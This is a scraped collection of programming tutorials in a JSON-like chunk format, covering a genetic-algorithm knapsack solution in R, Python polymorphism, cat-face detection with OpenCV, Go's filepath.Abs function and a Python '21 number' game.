Best = 61.00GA | iter = 3 | Mean = 33.08 | Best = 61.00GA | iter = 4 | Mean = 36.14 | Best = 61.00GA | iter = 5 | Mean = 42.42 | Best = 61.00GA | iter = 6 | Mean = 36.56 | Best = 61.00GA | iter = 7 | Mean = 37.32 | Best = 61.00GA | iter = 8 | Mean = 38.18 | Best = 61.00GA | iter = 9 | Mean = 39.02 | Best = 61.00GA | iter = 10 | Mean = 38.92 | Best = 61.00GA | iter = 11 | Mean = 37.54 | Best = 61.00GA | iter = 12 | Mean = 35.14 | Best = 61.00GA | iter = 13 | Mean = 36.28 | Best = 61.00GA | iter = 14 | Mean = 40.82 | Best = 61.00GA | iter = 15 | Mean = 44.26 | Best = 61.00GA | iter = 16 | Mean = 41.62 | Best = 61.00GA | iter = 17 | Mean = 38.66 | Best = 61.00GA | iter = 18 | Mean = 36.24 | Best = 61.00GA | iter = 19 | Mean = 43 | Best = 61GA | iter = 20 | Mean = 43.48 | Best = 61.00GA | iter = 21 | Mean = 43.08 | Best = 61.00GA | iter = 22 | Mean = 44.88 | Best = 61.00GA | iter = 23 | Mean = 46.84 | Best = 61.00GA | iter = 24 | Mean = 46.8 | Best = 61.0GA | iter = 25 | Mean = 42.62 | Best = 61.00GA | iter = 26 | Mean = 46.52 | Best = 61.00GA | iter = 27 | Mean = 46.14 | Best = 61.00GA | iter = 28 | Mean = 43.8 | Best = 61.0GA | iter = 29 | Mean = 46.16 | Best = 61.00GA | iter = 30 | Mean = 42.6 | Best = 61.0> summary(GA)-- Genetic Algorithm ------------------- GA settings: Type = binary Population size = 50 Number of generations = 30 Elitism = 2 Crossover probability = 0.8 Mutation probability = 0.1GA results: Iterations = 30 Fitness function value = 61 Solution = x1 x2 x3 x4 x5 x6 x7 x8 x9[1,] 1 0 1 1 0 0 1 1 1> GA@summary max mean q3 median q1 min[1,] 61 31.92 48 36.0 16 0[2,] 61 31.32 47 31.0 24 0[3,] 61 33.08 51 36.5 13 0[4,] 61 36.14 52 39.0 31 0[5,] 61 42.42 56 47.5 38 0[6,] 61 36.56 52 41.5 26 0[7,] 61 37.32 54 43.0 29 0[8,] 61 38.18 54 43.0 29 0[9,] 61 39.02 55 47.0 33 0[10,] 61 38.92 52 43.5 33 0[11,] 61 37.54 48 39.0 33 0[12,] 61 35.14 47 39.0 29 0[13,] 61 36.28 47 41.0 23 0[14,] 61 40.82 51 43.0 34 0[15,] 61 44.26 51 48.0 38 20[16,] 61 41.62 52 45.0 34 0[17,] 61 38.66 53 41.5 28 0[18,] 61 36.24 51 39.5 28 0[19,] 61 43.00 56 48.0 37 0[20,] 61 43.48 56 48.0 39 0[21,] 61 43.08 56 48.0 40 0[22,] 61 44.88 56 51.0 41 0[23,] 61 46.84 56 52.0 41 0[24,] 61 46.80 56 48.0 41 0[25,] 61 42.62 56 48.0 33 0[26,] 61 46.52 56 48.0 42 0[27,] 61 46.14 54 47.0 43 0[28,] 61 43.80 56 49.5 40 0[29,] 61 46.16 54 50.0 43 0[30,] 61 42.60 56 48.0 36 0" }, { "code": null, "e": 8966, "s": 8663, "text": "From the result above, we can see that the performance for every individual is increasing in each generation. We can see it from the fitness value (i.e. the survival points in this case) mean and median that tends to increases in each generation. Let’s try to train it again, but with more generations." }, { "code": null, "e": 9186, "s": 8966, "text": "GA2=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=50,popSize=50,seed=1234,keepBest=TRUE)GA3=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=100,popSize=50,seed=1234,keepBest=TRUE)plot(GA2)plot(GA3)" }, { "code": null, "e": 9479, "s": 9186, "text": "From GA2 and GA3 , we can see that the optimization result for each individual is at their best on generation 40-ish and 60-ish, according to the mean and median of fitness value on that generation. We can also see that the best fitness value is increasing to 62 from 72nd generation onwards." }, { "code": null, "e": 9709, "s": 9479, "text": "Since we keep the best result on every optimization process, we want to find out the items that we can bring for hiking based on the best result from the genetic algorithm optimization. We can see the summary from GA3 as follows." }, { "code": null, "e": 10095, "s": 9709, "text": "> summary(GA3)-- Genetic Algorithm ------------------- GA settings: Type = binary Population size = 50 Number of generations = 100 Elitism = 2 Crossover probability = 0.8 Mutation probability = 0.1GA results: Iterations = 100 Fitness function value = 62 Solution = x1 x2 x3 x4 x5 x6 x7 x8 x9[1,] 1 1 1 1 1 0 0 1 1" }, { "code": null, "e": 10378, "s": 10095, "text": "From the result above, we can conclude that the items that we can include in the knapsack are a raincoat, pocket knife, mineral water, gloves, sleeping bag, canned food, and snacks. We can calculate the weight of the knapsack, to make sure that the knapsack is not over capacitated." }, { "code": null, "e": 10459, "s": 10378, "text": "> chromosomes_final=c(1,1,1,1,1,0,0,1,1)> cat(chromosomes_final%*%data$weight)25" }, { "code": null, "e": 10544, "s": 10459, "text": "Great! We can see that the weight of the items is the same as the knapsack capacity!" }, { "code": null, "e": 10555, "s": 10544, "text": "Conclusion" }, { "code": null, "e": 10936, "s": 10555, "text": "And there you go! You can go hiking with your friends (best to do after the pandemic is over, of course) with maximum survival points and capacity by implementing the genetic algorithm in R. In fact, you can solve the knapsack problem by using genetic algorithm in many real-world applications, such as choosing the best-performing portfolio, production scheduling, and many more." }, { "code": null, "e": 11056, "s": 10936, "text": "As usual, feel free to contact me via my LinkedIn if you have any questions or discussions. Stay safe and stay healthy!" }, { "code": null, "e": 11067, "s": 11056, "text": "References" }, { "code": null, "e": 11171, "s": 11067, "text": "[1] G. B. Matthews, On the Partition of Numbers (1897), Proceedings of the London Mathematical Society." }, { "code": null, "e": 11272, "s": 11171, "text": "[2] Luca Scrucca, GA: A Package for Genetic Algorithms in R (2013), Journal of Statistical Software." }, { "code": null, "e": 11342, "s": 11272, "text": "[3] https://www.rdocumentation.org/packages/GA/versions/3.2/topics/ga" }, { "code": null, "e": 11466, "s": 11342, "text": "[4] Harvey M. Salkin and Cornelis A. De Kluyver, The knapsack problem: A survey (1975), Naval Research Logistics Quarterly." }, { "code": null, "e": 11631, "s": 11466, "text": "[5] Krzysztof Dudziński and Stanisław Walukiewicz, Exact methods for the knapsack problem and its generalizations (1987), European Journal of Operational Research." } ]
Polymorphism in Python
Polymorphism means multiple forms. In python we can find the same operator or function taking multiple forms. It also useful in creating different classes which will have class methods with same name. That helps in re using a lot of code and decreases code complexity. Polymorphism is also linked to inheritance as we will see in some examples below. The + operator can take two inputs and give us the result depending on what the inputs are. In the below examples we can see how the integer inputs yield an integer and if one of the input is float then the result becomes a float. Also for strings, they simply get concatenated. This happens automatically because of the way the + operator is created in python. a = 23 b = 11 c = 9.5 s1 = "Hello" s2 = "There!" print(a + b) print(type(a + b)) print(b + c) print(type (b + c)) print(s1 + s2) print(type(s1 + s2)) Running the above code gives us the following result − 34 20.5 HelloThere! We can also see that different python functions can take inputs of different types and then process them differently. When we supply a string value to len() it counts every letter in it. But if we five tuple or a dictionary as an input, it processes them differently. str = 'Hi There !' tup = ('Mon','Tue','wed','Thu','Fri') lst = ['Jan','Feb','Mar','Apr'] dict = {'1D':'Line','2D':'Triangle','3D':'Sphere'} print(len(str)) print(len(tup)) print(len(lst)) print(len(dict)) Running the above code gives us the following result − 10 5 4 3 We can create methods with same name but wrapped under different class names. So we can keep calling the same method with different class name pre-fixed to get different result. In the below example we have two classes, rectangle and circle to get their perimeter and area using same methods. from math import pi class Rectangle: def __init__(self, length, breadth): self.l = length self.b = breadth def perimeter(self): return 2*(self.l + self.b) def area(self): return self.l * self.b class Circle: def __init__(self, radius): self.r = radius def perimeter(self): return 2 * pi * self.r def area(self): return pi * self.r ** 2 # Initialize the classes rec = Rectangle(5,3) cr = Circle(4) print("Perimter of rectangel: ",rec.perimeter()) print("Area of rectangel: ",rec.area()) print("Perimter of Circle: ",cr.perimeter()) print("Area of Circle: ",cr.area()) Running the above code gives us the following result − Perimter of rectangel: 16 Area of rectangel: 15 Perimter of Circle: 25.132741228718345 Area of Circle: 50.26548245743669
[ { "code": null, "e": 1413, "s": 1062, "text": "Polymorphism means multiple forms. In python we can find the same operator or function taking multiple forms. It also useful in creating different classes which will have class methods with same name. That helps in re using a lot of code and decreases code complexity. Polymorphism is also linked to inheritance as we will see in some examples below." }, { "code": null, "e": 1775, "s": 1413, "text": "The + operator can take two inputs and give us the result depending on what the inputs are. In the below examples we can see how the integer inputs yield an integer and if one of the input is float then the result becomes a float. Also for strings, they simply get concatenated. This happens automatically because of the way the + operator is created in python." }, { "code": null, "e": 1925, "s": 1775, "text": "a = 23\nb = 11\nc = 9.5\ns1 = \"Hello\"\ns2 = \"There!\"\nprint(a + b)\nprint(type(a + b))\nprint(b + c)\nprint(type (b + c))\nprint(s1 + s2)\nprint(type(s1 + s2))" }, { "code": null, "e": 1980, "s": 1925, "text": "Running the above code gives us the following result −" }, { "code": null, "e": 2000, "s": 1980, "text": "34\n20.5\nHelloThere!" }, { "code": null, "e": 2268, "s": 2000, "text": "We can also see that different python functions can take inputs of different types and then process them differently. When we supply a string value to len() it counts every letter in it. But if we five tuple or a dictionary as an input, it processes them differently." }, { "code": null, "e": 2473, "s": 2268, "text": "str = 'Hi There !'\ntup = ('Mon','Tue','wed','Thu','Fri')\nlst = ['Jan','Feb','Mar','Apr']\ndict = {'1D':'Line','2D':'Triangle','3D':'Sphere'}\nprint(len(str))\nprint(len(tup))\nprint(len(lst))\nprint(len(dict))" }, { "code": null, "e": 2528, "s": 2473, "text": "Running the above code gives us the following result −" }, { "code": null, "e": 2537, "s": 2528, "text": "10\n5\n4\n3" }, { "code": null, "e": 2830, "s": 2537, "text": "We can create methods with same name but wrapped under different class names. So we can keep calling the same method with different class name pre-fixed to get different result. In the below example we have two classes, rectangle and circle to get their perimeter and area using same methods." }, { "code": null, "e": 3461, "s": 2830, "text": "from math import pi\n\nclass Rectangle:\n def __init__(self, length, breadth):\n self.l = length\n self.b = breadth\n def perimeter(self):\n return 2*(self.l + self.b)\n def area(self):\n return self.l * self.b\n\nclass Circle:\n def __init__(self, radius):\n self.r = radius\n def perimeter(self):\n return 2 * pi * self.r\n def area(self):\n return pi * self.r ** 2\n\n# Initialize the classes\nrec = Rectangle(5,3)\ncr = Circle(4)\nprint(\"Perimter of rectangel: \",rec.perimeter())\nprint(\"Area of rectangel: \",rec.area())\n\nprint(\"Perimter of Circle: \",cr.perimeter())\nprint(\"Area of Circle: \",cr.area())" }, { "code": null, "e": 3516, "s": 3461, "text": "Running the above code gives us the following result −" }, { "code": null, "e": 3637, "s": 3516, "text": "Perimter of rectangel: 16\nArea of rectangel: 15\nPerimter of Circle: 25.132741228718345\nArea of Circle: 50.26548245743669" } ]
Detect Cat Faces in Real-Time using Python-OpenCV - GeeksforGeeks
03 Jul, 2020 Face Detection is a technology to identify faces from the image. We use Python’s OpenCV for this. We can also use Face Detection in the case of Animals too. If one can take a close look at the OpenCV repository, the haar cascades directory to be specific (where the OpenCV stores all its pre-trained haar classifiers to detect various objects, body parts, etc.), there are two files: haarcascade_frontalcatface.xml haarcascade_frontalcatface_extended.xml The objective of the program given is to detect the object of interest(cat face) in real-time and to keep tracking the same object. This is a simple example of how to detect the cat face in Python. You can try to use training samples of any other object of your choice to be detected by training the classifier on required objects. Below is the implementation. # OpenCV program to detect cat face in real time # import libraries of python OpenCV # where its functionality resides import cv2 # load the required trained XML classifiers # https://github.com/Itseez/opencv/blob/master/ # data/haarcascades/haarcascade_frontalcatface.xml # Trained XML classifiers describes some features of some # object we want to detect a cascade function is trained # from a lot of positive(faces) and negative(non-faces) # images. face_cascade = cv2.CascadeClassifier('haarcascade_frontalcatface.xml') # capture frames from a camera cap = cv2.VideoCapture(0) # loop runs if capturing has been initialized. while 1: # reads frames from a camera ret, img = cap.read() # convert to gray scale of each frames gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # Detects faces of different sizes in the input image faces = face_cascade.detectMultiScale(gray, 1.3, 5) for (x,y,w,h) in faces: # To draw a rectangle in a face cv2.rectangle(img,(x,y),(x+w,y+h),(255,255,0),2) roi_gray = gray[y:y+h, x:x+w] roi_color = img[y:y+h, x:x+w] # Display an image in a window cv2.imshow('img',img) # Wait for Esc key to stop k = cv2.waitKey(30) & 0xff if k == 27: break # Close the window cap.release() # De-allocate any associated memory usage cv2.destroyAllWindows() Output: Python-OpenCV Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. How to Install PIP on Windows ? How To Convert Python Dictionary To JSON? How to drop one or multiple columns in Pandas Dataframe Check if element exists in list in Python Selecting rows in pandas DataFrame based on conditions Python | os.path.join() method Defaultdict in Python Python | Get unique values from a list Create a directory in Python Python | Pandas dataframe.groupby()
[ { "code": null, "e": 24292, "s": 24264, "text": "\n03 Jul, 2020" }, { "code": null, "e": 24676, "s": 24292, "text": "Face Detection is a technology to identify faces from the image. We use Python’s OpenCV for this. We can also use Face Detection in the case of Animals too. If one can take a close look at the OpenCV repository, the haar cascades directory to be specific (where the OpenCV stores all its pre-trained haar classifiers to detect various objects, body parts, etc.), there are two files:" }, { "code": null, "e": 24707, "s": 24676, "text": "haarcascade_frontalcatface.xml" }, { "code": null, "e": 24747, "s": 24707, "text": "haarcascade_frontalcatface_extended.xml" }, { "code": null, "e": 25079, "s": 24747, "text": "The objective of the program given is to detect the object of interest(cat face) in real-time and to keep tracking the same object. This is a simple example of how to detect the cat face in Python. You can try to use training samples of any other object of your choice to be detected by training the classifier on required objects." }, { "code": null, "e": 25108, "s": 25079, "text": "Below is the implementation." }, { "code": "# OpenCV program to detect cat face in real time # import libraries of python OpenCV # where its functionality resides import cv2 # load the required trained XML classifiers # https://github.com/Itseez/opencv/blob/master/ # data/haarcascades/haarcascade_frontalcatface.xml # Trained XML classifiers describes some features of some # object we want to detect a cascade function is trained # from a lot of positive(faces) and negative(non-faces) # images. face_cascade = cv2.CascadeClassifier('haarcascade_frontalcatface.xml') # capture frames from a camera cap = cv2.VideoCapture(0) # loop runs if capturing has been initialized. while 1: # reads frames from a camera ret, img = cap.read() # convert to gray scale of each frames gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # Detects faces of different sizes in the input image faces = face_cascade.detectMultiScale(gray, 1.3, 5) for (x,y,w,h) in faces: # To draw a rectangle in a face cv2.rectangle(img,(x,y),(x+w,y+h),(255,255,0),2) roi_gray = gray[y:y+h, x:x+w] roi_color = img[y:y+h, x:x+w] # Display an image in a window cv2.imshow('img',img) # Wait for Esc key to stop k = cv2.waitKey(30) & 0xff if k == 27: break # Close the window cap.release() # De-allocate any associated memory usage cv2.destroyAllWindows() ", "e": 26489, "s": 25108, "text": null }, { "code": null, "e": 26497, "s": 26489, "text": "Output:" }, { "code": null, "e": 26511, "s": 26497, "text": "Python-OpenCV" }, { "code": null, "e": 26518, "s": 26511, "text": "Python" }, { "code": null, "e": 26616, "s": 26518, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26648, "s": 26616, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 26690, "s": 26648, "text": "How To Convert Python Dictionary To JSON?" }, { "code": null, "e": 26746, "s": 26690, "text": "How to drop one or multiple columns in Pandas Dataframe" }, { "code": null, "e": 26788, "s": 26746, "text": "Check if element exists in list in Python" }, { "code": null, "e": 26843, "s": 26788, "text": "Selecting rows in pandas DataFrame based on conditions" }, { "code": null, "e": 26874, "s": 26843, "text": "Python | os.path.join() method" }, { "code": null, "e": 26896, "s": 26874, "text": "Defaultdict in Python" }, { "code": null, "e": 26935, "s": 26896, "text": "Python | Get unique values from a list" }, { "code": null, "e": 26964, "s": 26935, "text": "Create a directory in Python" } ]
filepath.Abs() Function in Golang With Examples - GeeksforGeeks
10 May, 2020 In Go language, path package used for paths separated by forwarding slashes, such as the paths in URLs. The filepath.Abs() function in Go language used to return an absolute representation of the specified path. If the path is not absolute it will be joined with the current working directory to turn it into an absolute path. Moreover, this function is defined under the path package. Here, you need to import the “path/filepath” package in order to use these functions. Syntax: func Abs(path string) (string, error) Here, ‘path’ is the specified path. Return Value: It return an absolute representation of the specified path. Example 1: // Golang program to illustrate the usage of// filepath.Abs() function // Including the main packagepackage main // Importing fmt and path/filepathimport ( "fmt" "path/filepath") // Calling mainfunc main() { // Calling the Abs() function to get // absolute representation of the specified path fmt.Println(filepath.Abs("/home/gfg")) fmt.Println(filepath.Abs(".gfg")) fmt.Println(filepath.Abs("/gfg")) fmt.Println(filepath.Abs(":gfg"))} Output: /home/gfg <nil> /.gfg <nil> /gfg <nil> /:gfg <nil> Example 2: // Golang program to illustrate the usage of// filepath.Abs() function // Including the main packagepackage main // Importing fmt and path/filepathimport ( "fmt" "path/filepath") // Calling mainfunc main() { // Calling the Abs() function to get // absolute representation of the specified path fmt.Println(filepath.Abs("/")) fmt.Println(filepath.Abs(".")) fmt.Println(filepath.Abs(":")) fmt.Println(filepath.Abs("/.")) fmt.Println(filepath.Abs("//")) fmt.Println(filepath.Abs(":/"))} Output: / <nil> / <nil> /: <nil> / <nil> / <nil> /: <nil> Golang-filepath Go Language Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. How to Parse JSON in Golang? Defer Keyword in Golang Time Durations in Golang Anonymous function in Go Language How to iterate over an Array using for loop in Golang? time.Parse() Function in Golang With Examples Loops in Go Language Strings in Golang Class and Object in Golang Structures in Golang
[ { "code": null, "e": 24460, "s": 24432, "text": "\n10 May, 2020" }, { "code": null, "e": 24932, "s": 24460, "text": "In Go language, path package used for paths separated by forwarding slashes, such as the paths in URLs. The filepath.Abs() function in Go language used to return an absolute representation of the specified path. If the path is not absolute it will be joined with the current working directory to turn it into an absolute path. Moreover, this function is defined under the path package. Here, you need to import the “path/filepath” package in order to use these functions." }, { "code": null, "e": 24940, "s": 24932, "text": "Syntax:" }, { "code": null, "e": 24979, "s": 24940, "text": "func Abs(path string) (string, error)\n" }, { "code": null, "e": 25015, "s": 24979, "text": "Here, ‘path’ is the specified path." }, { "code": null, "e": 25089, "s": 25015, "text": "Return Value: It return an absolute representation of the specified path." }, { "code": null, "e": 25100, "s": 25089, "text": "Example 1:" }, { "code": "// Golang program to illustrate the usage of// filepath.Abs() function // Including the main packagepackage main // Importing fmt and path/filepathimport ( \"fmt\" \"path/filepath\") // Calling mainfunc main() { // Calling the Abs() function to get // absolute representation of the specified path fmt.Println(filepath.Abs(\"/home/gfg\")) fmt.Println(filepath.Abs(\".gfg\")) fmt.Println(filepath.Abs(\"/gfg\")) fmt.Println(filepath.Abs(\":gfg\"))}", "e": 25565, "s": 25100, "text": null }, { "code": null, "e": 25573, "s": 25565, "text": "Output:" }, { "code": null, "e": 25625, "s": 25573, "text": "/home/gfg <nil>\n/.gfg <nil>\n/gfg <nil>\n/:gfg <nil>\n" }, { "code": null, "e": 25636, "s": 25625, "text": "Example 2:" }, { "code": "// Golang program to illustrate the usage of// filepath.Abs() function // Including the main packagepackage main // Importing fmt and path/filepathimport ( \"fmt\" \"path/filepath\") // Calling mainfunc main() { // Calling the Abs() function to get // absolute representation of the specified path fmt.Println(filepath.Abs(\"/\")) fmt.Println(filepath.Abs(\".\")) fmt.Println(filepath.Abs(\":\")) fmt.Println(filepath.Abs(\"/.\")) fmt.Println(filepath.Abs(\"//\")) fmt.Println(filepath.Abs(\":/\"))}", "e": 26155, "s": 25636, "text": null }, { "code": null, "e": 26163, "s": 26155, "text": "Output:" }, { "code": null, "e": 26214, "s": 26163, "text": "/ <nil>\n/ <nil>\n/: <nil>\n/ <nil>\n/ <nil>\n/: <nil>\n" }, { "code": null, "e": 26230, "s": 26214, "text": "Golang-filepath" }, { "code": null, "e": 26242, "s": 26230, "text": "Go Language" }, { "code": null, "e": 26340, "s": 26242, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26369, "s": 26340, "text": "How to Parse JSON in Golang?" }, { "code": null, "e": 26393, "s": 26369, "text": "Defer Keyword in Golang" }, { "code": null, "e": 26418, "s": 26393, "text": "Time Durations in Golang" }, { "code": null, "e": 26452, "s": 26418, "text": "Anonymous function in Go Language" }, { "code": null, "e": 26507, "s": 26452, "text": "How to iterate over an Array using for loop in Golang?" }, { "code": null, "e": 26553, "s": 26507, "text": "time.Parse() Function in Golang With Examples" }, { "code": null, "e": 26574, "s": 26553, "text": "Loops in Go Language" }, { "code": null, "e": 26592, "s": 26574, "text": "Strings in Golang" }, { "code": null, "e": 26619, "s": 26592, "text": "Class and Object in Golang" } ]
21 Number game in Python - GeeksforGeeks
31 Jan, 2022 21, Bagram, or Twenty plus one is a game which progresses by counting up 1 to 21, with the player who calls “21” is eliminated. It can be played between any number of players. ImplementationThis is a simple 21 number game using Python programming language. The game illustrated here is between the player and the computer. There can be many variations in the game. The player can choose to start first or second. The list of numbers is shown before the Player takes his turn so that it becomes convenient. If consecutive numbers are not given in input then the player is automatically disqualified. The player loses if he gets the chance to call 21 and wins otherwise. Winning against the computer can be possible by choosing to play second. The strategy is to call numbers till the multiple of 4 which would eventually lead to 21 on computer hence making the player the winner. # Python code to play 21 Number game # returns the nearest multiple to 4def nearestMultiple(num): if num >= 4: near = num + (4 - (num % 4)) else: near = 4 return near def lose1(): print ("\n\nYOU LOSE !") print("Better luck next time !") exit(0) # checks whether the numbers are consecutivedef check(xyz): i = 1 while i<len(xyz): if (xyz[i]-xyz[i-1])!= 1: return False i = i + 1 return True # starts the gamedef start1(): xyz = [] last = 0 while True: print ("Enter 'F' to take the first chance.") print("Enter 'S' to take the second chance.") chance = input('> ') # player takes the first chance if chance == "F": while True: if last == 20: lose1() else: print ("\nYour Turn.") print ("\nHow many numbers do you wish to enter?") inp = int(input('> ')) if inp > 0 and inp <= 3: comp = 4 - inp else: print ("Wrong input. You are disqualified from the game.") lose1() i, j = 1, 1 print ("Now enter the values") while i <= inp: a = input('> ') a = int(a) xyz.append(a) i = i + 1 # store the last element of xyz. last = xyz[-1] # checks whether the input # numbers are consecutive if check(xyz) == True: if last == 21: lose1() else: #"Computer's turn." while j <= comp: xyz.append(last + j) j = j + 1 print ("Order of inputs after computer's turn is: ") print (xyz) last = xyz[-1] else: print ("\nYou did not input consecutive integers.") lose1() # player takes the second chance elif chance == "S": comp = 1 last = 0 while last < 20: #"Computer's turn" j = 1 while j <= comp: xyz.append(last + j) j = j + 1 print ("Order of inputs after computer's turn is:") print (xyz) if xyz[-1] == 20: lose1() else: print ("\nYour turn.") print ("\nHow many numbers do you wish to enter?") inp = input('> ') inp = int(inp) i = 1 print ("Enter your values") while i <= inp: xyz.append(int(input('> '))) i = i + 1 last = xyz[-1] if check(xyz) == True: # print (xyz) near = nearestMultiple(last) comp = near - last if comp == 4: comp = 3 else: comp = comp else: # if inputs are not consecutive # automatically disqualified print ("\nYou did not input consecutive integers.") # print ("You are disqualified from the game.") lose1() print ("\n\nCONGRATULATIONS !!!") print ("YOU WON !") exit(0) else: print ("wrong choice") game = True while game == True: print ("Player 2 is Computer.") print("Do you want to play the 21 number game? (Yes / No)") ans = input('> ') if ans =='Yes': start1() else: print ("Do you want quit the game?(yes / no)") nex = input('> ') if nex == "yes": print ("You are quitting the game...") exit(0) elif nex == "no": print ("Continuing...") else: print ("Wrong choice") Output: Player 2 is Computer. Do you want to start the game? (Yes/No) > Yes Enter 'F' to take the first chance. Enter 'S' to take the second chance. > S Order of inputs after computer's turn is: [1] Your turn. How many numbers do you wish to enter? > 3 Enter your values > 2 > 3 > 4 Order of inputs after computer's turn is: [1, 2, 3, 4, 5, 6, 7] Your turn. How many numbers do you wish to enter? > 1 Enter your values > 8 Order of inputs after computer's turn is: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11] Your turn. How many numbers do you wish to enter? > 1 Enter your values > 12 Order of inputs after computer's turn is: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15] Your turn. How many numbers do you wish to enter? > 1 Enter your values > 16 Order of inputs after computer's turn is: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19] Your turn. How many numbers do you wish to enter? > 1 Enter your values > 20 CONGRATULATIONS!!! YOU WON! Try it yourself as exercise: You can further enhance program by increasing the number of players. You can also use only even/odd numbers. You can replace the numbers with binary number system. You can add levels with variations in the game. simranarora5sos python-utility Python Python Programs Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Python Dictionary Enumerate() in Python How to Install PIP on Windows ? Different ways to create Pandas Dataframe Python String | replace() Defaultdict in Python Python | Split string into list of characters Python | Get dictionary keys as a list Python | Convert a list to dictionary Python program to check whether a number is Prime or not
[ { "code": null, "e": 24716, "s": 24688, "text": "\n31 Jan, 2022" }, { "code": null, "e": 24892, "s": 24716, "text": "21, Bagram, or Twenty plus one is a game which progresses by counting up 1 to 21, with the player who calls “21” is eliminated. It can be played between any number of players." }, { "code": null, "e": 25081, "s": 24892, "text": "ImplementationThis is a simple 21 number game using Python programming language. The game illustrated here is between the player and the computer. There can be many variations in the game." }, { "code": null, "e": 25129, "s": 25081, "text": "The player can choose to start first or second." }, { "code": null, "e": 25222, "s": 25129, "text": "The list of numbers is shown before the Player takes his turn so that it becomes convenient." }, { "code": null, "e": 25315, "s": 25222, "text": "If consecutive numbers are not given in input then the player is automatically disqualified." }, { "code": null, "e": 25385, "s": 25315, "text": "The player loses if he gets the chance to call 21 and wins otherwise." }, { "code": null, "e": 25595, "s": 25385, "text": "Winning against the computer can be possible by choosing to play second. The strategy is to call numbers till the multiple of 4 which would eventually lead to 21 on computer hence making the player the winner." }, { "code": "# Python code to play 21 Number game # returns the nearest multiple to 4def nearestMultiple(num): if num >= 4: near = num + (4 - (num % 4)) else: near = 4 return near def lose1(): print (\"\\n\\nYOU LOSE !\") print(\"Better luck next time !\") exit(0) # checks whether the numbers are consecutivedef check(xyz): i = 1 while i<len(xyz): if (xyz[i]-xyz[i-1])!= 1: return False i = i + 1 return True # starts the gamedef start1(): xyz = [] last = 0 while True: print (\"Enter 'F' to take the first chance.\") print(\"Enter 'S' to take the second chance.\") chance = input('> ') # player takes the first chance if chance == \"F\": while True: if last == 20: lose1() else: print (\"\\nYour Turn.\") print (\"\\nHow many numbers do you wish to enter?\") inp = int(input('> ')) if inp > 0 and inp <= 3: comp = 4 - inp else: print (\"Wrong input. You are disqualified from the game.\") lose1() i, j = 1, 1 print (\"Now enter the values\") while i <= inp: a = input('> ') a = int(a) xyz.append(a) i = i + 1 # store the last element of xyz. last = xyz[-1] # checks whether the input # numbers are consecutive if check(xyz) == True: if last == 21: lose1() else: #\"Computer's turn.\" while j <= comp: xyz.append(last + j) j = j + 1 print (\"Order of inputs after computer's turn is: \") print (xyz) last = xyz[-1] else: print (\"\\nYou did not input consecutive integers.\") lose1() # player takes the second chance elif chance == \"S\": comp = 1 last = 0 while last < 20: #\"Computer's turn\" j = 1 while j <= comp: xyz.append(last + j) j = j + 1 print (\"Order of inputs after computer's turn is:\") print (xyz) if xyz[-1] == 20: lose1() else: print (\"\\nYour turn.\") print (\"\\nHow many numbers do you wish to enter?\") inp = input('> ') inp = int(inp) i = 1 print (\"Enter your values\") while i <= inp: xyz.append(int(input('> '))) i = i + 1 last = xyz[-1] if check(xyz) == True: # print (xyz) near = nearestMultiple(last) comp = near - last if comp == 4: comp = 3 else: comp = comp else: # if inputs are not consecutive # automatically disqualified print (\"\\nYou did not input consecutive integers.\") # print (\"You are disqualified from the game.\") lose1() print (\"\\n\\nCONGRATULATIONS !!!\") print (\"YOU WON !\") exit(0) else: print (\"wrong choice\") game = True while game == True: print (\"Player 2 is Computer.\") print(\"Do you want to play the 21 number game? (Yes / No)\") ans = input('> ') if ans =='Yes': start1() else: print (\"Do you want quit the game?(yes / no)\") nex = input('> ') if nex == \"yes\": print (\"You are quitting the game...\") exit(0) elif nex == \"no\": print (\"Continuing...\") else: print (\"Wrong choice\") ", "e": 30275, "s": 25595, "text": null }, { "code": null, "e": 30283, "s": 30275, "text": "Output:" }, { "code": null, "e": 31253, "s": 30283, "text": "Player 2 is Computer.\nDo you want to start the game? (Yes/No)\n> Yes\nEnter 'F' to take the first chance.\nEnter 'S' to take the second chance.\n> S\nOrder of inputs after computer's turn is:\n[1]\n\nYour turn.\n\nHow many numbers do you wish to enter?\n> 3\nEnter your values\n> 2\n> 3\n> 4\nOrder of inputs after computer's turn is:\n[1, 2, 3, 4, 5, 6, 7]\n\nYour turn.\n\nHow many numbers do you wish to enter?\n> 1\nEnter your values\n> 8\nOrder of inputs after computer's turn is:\n[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\n\nYour turn.\n\nHow many numbers do you wish to enter?\n> 1\nEnter your values\n> 12\nOrder of inputs after computer's turn is:\n[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n\nYour turn.\n\nHow many numbers do you wish to enter?\n> 1\nEnter your values\n> 16\nOrder of inputs after computer's turn is:\n[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]\n\nYour turn.\n\nHow many numbers do you wish to enter?\n> 1\nEnter your values\n> 20\n\n\nCONGRATULATIONS!!!\nYOU WON! \n" }, { "code": null, "e": 31282, "s": 31253, "text": "Try it yourself as exercise:" }, { "code": null, "e": 31351, "s": 31282, "text": "You can further enhance program by increasing the number of players." }, { "code": null, "e": 31391, "s": 31351, "text": "You can also use only even/odd numbers." }, { "code": null, "e": 31446, "s": 31391, "text": "You can replace the numbers with binary number system." }, { "code": null, "e": 31494, "s": 31446, "text": "You can add levels with variations in the game." }, { "code": null, "e": 31510, "s": 31494, "text": "simranarora5sos" }, { "code": null, "e": 31525, "s": 31510, "text": "python-utility" }, { "code": null, "e": 31532, "s": 31525, "text": "Python" }, { "code": null, "e": 31548, "s": 31532, "text": "Python Programs" }, { "code": null, "e": 